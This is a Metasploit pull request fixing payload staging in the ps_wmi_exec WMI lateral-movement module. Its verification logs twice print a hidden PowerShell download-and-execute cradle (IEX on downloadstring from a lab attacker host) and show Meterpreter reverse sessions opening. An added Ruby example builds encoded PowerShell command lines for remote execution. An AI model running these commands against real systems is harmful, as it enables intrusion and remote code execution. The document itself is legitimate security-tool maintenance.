Fix issue in ps_wmi_exec and powershell staging #8330

Merged 3 commits into rapid7:master on May 13, 2017

Conversation

kaospunk (Contributor) commented May 2, 2017

The staging function in the post/windows/powershell class was broken
in a previous commit as the definition for env_variable was removed and
env_prefix alone is now used. This caused an error to be thrown when
attempting to stage the payload. This changes the reference from
env_variable to env_prefix.

Additionally, the ps_wmi_exec module created a powershell script to be
run that was intended to be used with the EncodedCommand command line
option; however the script itself was never actually encoded. This
change passes the compressed script to the encode_script function to
resolve that issue.

Verification

  • Start msfconsole
  • Set up a session on the first Windows host (such as via web_delivery)
  • Attempt to run ps_wmi_exec through the established session against a second Windows host and verify you receive an error
  • Switch to fixed branch and start msfconsole
  • Set up a session on the first host again
  • Attempt to run ps_wmi_exec through the established session against the second Windows host and verify no error is received and a session is established
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.151.129:8443
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/CTPsxOrvc6Jk
[*] Local IP: http://127.0.0.1:8080/CTPsxOrvc6Jk
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://192.168.151.129:8080/CTPsxOrvc6Jk');
[*] 192.168.151.132  web_delivery - Delivering Payload

Execute the powershell to establish session:
[*] https://192.168.151.129:8443 handling request from 192.168.151.132; (UUID: nesvi3c3) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 1 opened (192.168.151.129:8443 -> 192.168.151.132:2661) at 2017-04-28 03:06:03 -0400


Attempt to run ps_wmi_exec through the established session and get error:
msf exploit(ps_wmi_exec) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ps_wmi_exec) > set LHOST 192.168.151.129
LHOST => 192.168.151.129
msf exploit(ps_wmi_exec) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(ps_wmi_exec) > set RHOSTS 192.168.151.134
RHOSTS => 192.168.151.134
msf exploit(ps_wmi_exec) > exploit

[-] Exploit failed: NameError undefined local variable or method `env_variable' for #<Msf::Modules::Mod6578706c6f69742f77696e646f77732f6c6f63616c2f70735f776d695f65786563::MetasploitModule:0x005601fd3c1c70>

Switch to fixed branch:
Get session on first host again:
resource (web_delivery)> exploit
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.151.129:8443
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
msf exploit(web_delivery) > [*] Using URL: http://0.0.0.0:8080/TqwTlIH
[*] Local IP: http://127.0.0.1:8080/TqwTlIH
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://192.168.1.230:8080/TqwTlIH');

[*] https://192.168.1.230:8443 handling request from 192.168.151.132; (UUID: tbqevwu2) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (192.168.151.129:8443 -> 192.168.151.132:3152) at 2017-04-28 03:11:28 -0400


Attempt to exploit second box again:
msf exploit(web_delivery) > use exploit/windows/local/ps_wmi_exec
msf exploit(ps_wmi_exec) > set SESSION 1
SESSION => 1
msf exploit(ps_wmi_exec) > set RHOSTS 192.168.151.134
RHOSTS => 192.168.151.134
msf exploit(ps_wmi_exec) > set disablepayloadhandler true
disablepayloadhandler => true
msf exploit(ps_wmi_exec) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(ps_wmi_exec) > set LHOST 192.168.151.129
LHOST => 192.168.151.129
msf exploit(ps_wmi_exec) > exploit

[+]  - Bytes remaining: 12448
[+]  - Bytes remaining: 4448
[+] Payload successfully staged.
msf exploit(ps_wmi_exec) > 
[*] https://192.168.1.230:8443 handling request from 192.168.151.134; (UUID: tbqevwu2) Staging x86 payload (958531 bytes) ...
[*] Meterpreter session 2 opened (192.168.151.129:8443 -> 192.168.151.134:50127) at 2017-04-28 03:13:12 -0400
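Both defects the description calls out concern how the script text reaches powershell.exe on the second host. As an added illustration, written for this page and not taken from Metasploit's Rex::Powershell helpers or the ps_wmi_exec module, the stand-alone Ruby below shows why the missing encode step matters: -EncodedCommand expects Base64 of the command text in UTF-16LE, so a script that is only compressed (or Base64 of its ASCII bytes) is not what powershell.exe will run. The DEFLATE wrapper stub, the flag set on the command line, and the 32767-character CreateProcess limit check are this example's own choices, not the module's.

```ruby
require 'base64'
require 'zlib'

# Raw DEFLATE (no zlib header or trailer) so the PowerShell side can inflate
# it with IO.Compression.DeflateStream. Assumed scheme, for illustration only.
def compress_raw(script)
  deflater = Zlib::Deflate.new(Zlib::BEST_COMPRESSION, -Zlib::MAX_WBITS)
  raw = deflater.deflate(script, Zlib::FINISH)
  deflater.close
  raw
end

# Wrap the compressed script in a small stub that decompresses and IEXs it.
# The stub is this example's own; it is not the ps_wmi_exec module's stub.
def compress_script(script)
  payload = Base64.strict_encode64(compress_raw(script))
  "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('#{payload}'));" \
  "IEX (New-Object IO.StreamReader(" \
  "New-Object IO.Compression.DeflateStream($s,[IO.Compression.CompressionMode]::Decompress)" \
  ")).ReadToEnd()"
end

# -EncodedCommand takes Base64 of the command text encoded as UTF-16LE.
# Passing the bare compressed stub (or Base64 of its ASCII bytes) is the
# missing step the PR description refers to.
def encode_script(script)
  Base64.strict_encode64(script.encode('UTF-16LE'))
end

# Inverse of encode_script: recovers what powershell.exe would actually execute.
def decode_encoded_command(b64)
  Base64.strict_decode64(b64).force_encoding('UTF-16LE').encode('UTF-8')
end

# Full command line as it would be handed to Win32_Process.Create over WMI.
def build_command_line(script)
  "powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden " \
  "-EncodedCommand #{encode_script(compress_script(script))}"
end

# CreateProcess caps the command line at 32767 characters; a larger script has
# to be staged another way (the module stages it through environment variables,
# which is the "Bytes remaining" output in the verification log above).
MAX_COMMAND_LINE = 32_767
def fits_command_line?(cmdline)
  cmdline.length <= MAX_COMMAND_LINE
end

if __FILE__ == $PROGRAM_NAME
  script = "Write-Host 'staged via WMI'" # constructed sample script
  cmd = build_command_line(script)
  puts cmd
  puts "decoded: #{decode_encoded_command(cmd.split.last)}"
  puts "fits CreateProcess limit: #{fits_command_line?(cmd)}"
end
```

decode_encoded_command is the check worth keeping around: run it on the last token of a generated command line and you see exactly the text the target's powershell.exe will parse, which makes a forgotten or doubled encoding step obvious before anything touches a remote host.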

Commits:
  • (commit message identical to the description above)
  • Remove explicitly loading msf/core and self.class from the register_ functions.
  • Helps to actually remove the bits that were failing. Now with even more removal of msf/core!
zeroSteiner self-assigned this May 10, 2017

sempervictus (Contributor) commented:

@kaospunk: good catch boss - looks like upstream was rather broken. I just looked over the commit history on this stuff in r7/master, looks like there was some strangeness with who committed what, probably as some sort of merge conflict resolution on one of my pathologically stale PRs. We definitely lost a few pieces along the way, and it looks to have been broken for some time now.
Pulled your PR into a running instance from the R7 master branch, and staged a rev_tcp payload via WMI:

[+] [2017.05.10-21:15:26] Successfully launched on 10.71.71.144 with a process id of 1700

busterb (Member) commented May 11, 2017

@bwatters-r7 this is something good to pull into your test suite

busterb (Member) commented May 11, 2017

Looks good to me too, thanks @kaospunk

zeroSteiner (Contributor) commented:

Got this tested and it looks good to me, so I'll land it here shortly. One thing to note is that the missing variable exception requires that the changes to the ps_wmi_exec.rb file be present. I made one small change to rename env_prefix back to env_variable since it's no longer being used as a prefix but rather the entire variable.

Thanks @kaospunk!

zeroSteiner merged commit c4b3ba0 into rapid7:master May 13, 2017
zeroSteiner added a commit that referenced this pull request May 13, 2017
alrosenthal-r7 commented May 18, 2017

Release Notes

These fixes resolve an issue that prevented staging the payload in the msf/core/post/windows/powershell class and an issue that prevented use of the EncodedCommand command line option with the exploits/windows/local/ps_wmi_exec exploit.

alrosenthal-r7 added the rn-fix (release notes fix) label May 18, 2017

Labels: bug, rn-fix